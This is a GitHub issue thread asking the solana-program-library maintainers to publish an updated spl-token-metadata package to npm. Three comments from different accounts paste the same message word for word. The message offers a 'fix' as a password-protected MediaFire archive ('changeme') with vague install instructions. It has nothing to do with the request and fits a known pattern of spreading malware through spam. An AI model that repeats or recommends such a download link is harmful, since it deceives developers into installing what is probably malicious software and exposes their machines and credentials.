### ISSUE TITLE
Request: Release new spl-token-metadata to npm

### ISSUE THREAD

**Issue by Serdnad** [solana-labs/solana-program-library#7202]
The latest version of the JS package spl-token-metadata published to NPM (v0.1.4) is out of date with the current state of the package in the repo.

Notably, since the last released version, there have been changes to reflect API changes to @solana/codecs.

Would it be possible to publish a new npm package? I also noticed the package.json still says v0.1.3, happy to help get the process going with a PR, if that'd help.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
